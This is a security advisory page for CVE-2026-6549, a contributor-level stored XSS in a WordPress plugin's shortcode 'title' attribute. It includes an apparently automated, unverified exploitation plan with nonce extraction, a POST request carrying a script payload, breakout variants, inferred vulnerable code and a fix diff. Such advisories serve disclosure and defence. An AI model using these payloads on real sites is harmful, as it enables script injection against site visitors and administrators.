WP-Safety
CVE-2026-6549

Logo Manager For Enamad <= 0.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'title' Shortcode Attribute

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=0.7.4
PublishedMay 19, 2026
Last updatedMay 20, 2026
Affected pluginlogo-manager-for-enamad
Research Plan
Unverified

This research plan outlines the process for analyzing and exploiting **CVE-2026-6549**, a Stored Cross-Site Scripting (XSS) vulnerability in the "Logo Manager For Enamad" WordPress plugin. ## 1. Vulnerability Summary * **Vulnerability Name:** Logo Manager For Enamad <= 0.7.4 - Authenticated (Cont…

Show full research plan

This research plan outlines the process for analyzing and exploiting CVE-2026-6549, a Stored Cross-Site Scripting (XSS) vulnerability in the "Logo Manager For Enamad" WordPress plugin.

1. Vulnerability Summary

  • Vulnerability Name: Logo Manager For Enamad <= 0.7.4 - Authenticated (Contributor+) Stored XSS
  • Vulnerable Component: Shortcode rendering logic for vc_enamad_namad, vc_enamad_shamed, and vc_enamad_custom.
  • Vulnerable Attribute: title
  • Cause: The plugin fails to sanitize or escape the title attribute when generating the HTML output for these shortcodes. Since Contributors can create posts and use shortcodes, they can inject malicious scripts that execute in the context of any user viewing the post (including Administrators).

2. Attack Vector Analysis

  • Endpoint: WordPress Post Editor (/wp-admin/post.php or /wp-admin/post-new.php).
  • Attack Parameter: The title attribute within a shortcode (e.g., [vc_enamad_namad title="PAYLOAD"]).
  • Required Authentication: Contributor-level account or higher.
  • Vulnerability Type: Stored XSS.
  • Preconditions: The plugin must be active, and the attacker must have permission to create or edit posts.

3. Code Flow (Inferred)

  1. Registration: The plugin (likely in enamad-logo.php or an included shortcodes.php) registers shortcodes via add_shortcode('vc_enamad_namad', 'render_callback_function').
  2. Parsing: When a post is rendered, WordPress calls do_shortcode(). The plugin's callback function receives an $atts array.
  3. Extraction: The callback typically uses shortcode_atts() to extract the title.
    • Predicted Code (inferred): $a = shortcode_atts( array( 'title' => '' ), $atts );
  4. Sink: The callback constructs an HTML string and returns it. The title value is concatenated without escaping.
    • Predicted Sink (inferred): return '<div class="enamad-box"><h3>' . $a['title'] . '</h3>...</div>';

4. Nonce Acquisition Strategy

To exploit this via the standard WordPress UI (storing the XSS), the agent must obtain a post-editing nonce.

  1. Login: Use the http_request tool to authenticate as a Contributor.
  2. Navigation: Use browser_navigate to go to wp-admin/post-new.php.
  3. Extraction: Use browser_eval to retrieve the core WordPress nonce and the allocated post ID.
    • Nonce Key: _wpnonce
    • JS Command: document.querySelector('#_wpnonce').value
    • Post ID JS: document.querySelector('#post_ID').value

5. Exploitation Strategy

The goal is to store the shortcode containing the payload and then verify its execution on the frontend.

Step 1: Store the Payload

  • Method: POST
  • URL: http://[target]/wp-admin/post.php
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: editpost
    • post_ID: [EXTRACTED_POST_ID]
    • _wpnonce: [EXTRACTED_NONCE]
    • post_title: Security Research - XSS
    • content: [vc_enamad_namad title='"><script>alert(document.domain)</script>']
    • publish: Publish

Step 2: Trigger the XSS

  • Action: Navigate to the frontend URL of the newly created post (usually http://[target]/?p=[POST_ID]).
  • Verification: Check the page source for the unescaped payload.

6. Test Data Setup

  1. Plugin: Install and activate logo-manager-for-enamad version 0.7.4.
  2. User: Create a user with the contributor role.
    • wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  3. Page Creation (Optional): If needed for testing, create a page containing the shortcode via CLI to verify the sink before automating the HTTP request.
    • wp post create --post_type=post --post_status=publish --post_content="[vc_enamad_namad title='CanaryValue']"

7. Expected Results

  • The POST request to post.php should return a 302 redirect to the post editor with a success message.
  • When the frontend post is fetched via http_request, the response body should contain the literal string: "><script>alert(document.domain)</script>.
  • The JavaScript should execute in the browser context if viewed via browser_navigate.

8. Verification Steps

  1. Verify Storage: Use WP-CLI to confirm the payload is in the database.
    • wp post get [POST_ID] --field=post_content
  2. Verify Output: Use http_request to fetch the frontend and check for the lack of encoding.
    • response = http_request("GET", "http://target/?p=[POST_ID]")
    • Confirm "<script>alert" exists and is NOT converted to &lt;script&gt;.

9. Alternative Approaches

  • Shortcode Variations: If vc_enamad_namad is sanitized in a specific version, test vc_enamad_shamed and vc_enamad_custom, as they likely share the same vulnerable rendering logic (inferred).
  • Attribute Breakout: If the title is rendered inside an attribute (e.g., <div title="[TITLE]">), use a breakout payload: x" onmouseover="alert(1)" b=".
  • REST API: If the block editor is active, attempt to update the post via /wp-json/wp/v2/posts/[ID] using a REST nonce (window.wpApiSettings.nonce).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute in its vc_enamad_namad, vc_enamad_shamed, and vc_enamad_custom shortcodes. This vulnerability allows authenticated users with Contributor-level access or higher to inject arbitrary web scripts into pages that execute when accessed by other users.

Vulnerable Code

// Inferred from plugin shortcode rendering logic
function vc_enamad_namad_render($atts) {
    $a = shortcode_atts( array(
        'title' => '',
    ), $atts );

    // Vulnerable Sink: the title attribute is concatenated without escaping
    return '<div class="enamad-box"><h3>' . $a['title'] . '</h3>...</div>';
}
add_shortcode('vc_enamad_namad', 'vc_enamad_namad_render');

Security Fix

--- a/enamad-logo.php
+++ b/enamad-logo.php
@@ -10,7 +10,7 @@
     ), $atts );
 
-    return '<div class="enamad-box"><h3>' . $a['title'] . '</h3>...</div>';
+    return '<div class="enamad-box"><h3>' . esc_html($a['title']) . '</h3>...</div>';

Exploit Outline

The exploit requires an authenticated user with at least Contributor-level permissions. The attacker navigates to the WordPress post editor and creates a new post or page. Within the content, the attacker inserts one of the vulnerable shortcodes (e.g., [vc_enamad_namad]) and sets the 'title' attribute to a malicious script payload, such as '><script>alert(document.domain)</script>'. Once the post is saved or published, the script is stored in the database. When any user (including administrators) views the rendered post on the frontend, the unsanitized 'title' attribute is printed directly into the HTML, triggering the script execution in their browser context.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6d1167-c89d-4c97-9446-b968df945e6c?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database